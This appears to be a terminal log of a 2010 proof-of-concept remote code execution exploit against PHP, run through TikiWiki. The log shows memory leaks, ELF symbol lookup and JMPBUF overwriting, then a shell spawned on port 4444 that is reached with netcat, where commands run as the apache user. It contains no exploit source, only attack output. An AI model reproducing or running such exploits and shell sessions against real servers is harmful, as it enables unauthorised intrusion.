$ ./exploit.py -h http://t.testsystem/ PHP xxx() Remote Code Execution Exploit (TikiWiki Version) Copyright (C) 2010 Stefan Esser/SektionEins GmbH *** DO NOT DISTRIBUTE *** [+] Connecting to determine wordsize [+] Wordsize is 32 bit [+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x [+] PHP version is 5.3.x [+] Connecting to determine XXX version [+] PHP version >= 5.3.2 [+] Determining endianess of system [+] System is little endian [+] Leaking address of std_object_handlers [+] Found std_object_handlers address to be 0xb76e84a0 [+] Leaking std_object_handlers [+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0) [+] Optimized to 0xb74008f0 [+] Scanning for executable header [+] ELF header found at 0xb73ab000 [+] Retrieving and parsing ELF header [+] Retrieving program headers [+] Retrieving ELF string table [+] Looking up ELF symbol: executor_globals [+] Found executor_globals at 0xb76fe280 [+] Looking up ELF symbol: php_execute_script [+] Found php_execute_script at 0xb75386c0 [+] Looking up ELF symbol: zend_eval_string [+] Found zend_eval_string at 0xb7586580 [+] Searching JMPBUF in executor_globals [+] Found JMPBUF at 0xbfcc64b4 [+] Attempt to crack JMPBUF [+] Determined stored EIP value 0xb753875a from pattern match [+] Calculated XORER 0x68ab06ea [+] Unmangled stored ESP is 0xbfcc5470 [+] Checking memory infront of JMPBUF for overwriting possibilities [+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline [+] Returning into PHP... Spawning a shell at port 4444 ... $ nc t.testsystem 4444 Welcome to the PHPShell 5/22/2010 1:27 am system("uname -a"); Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux system("id"); uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0 ...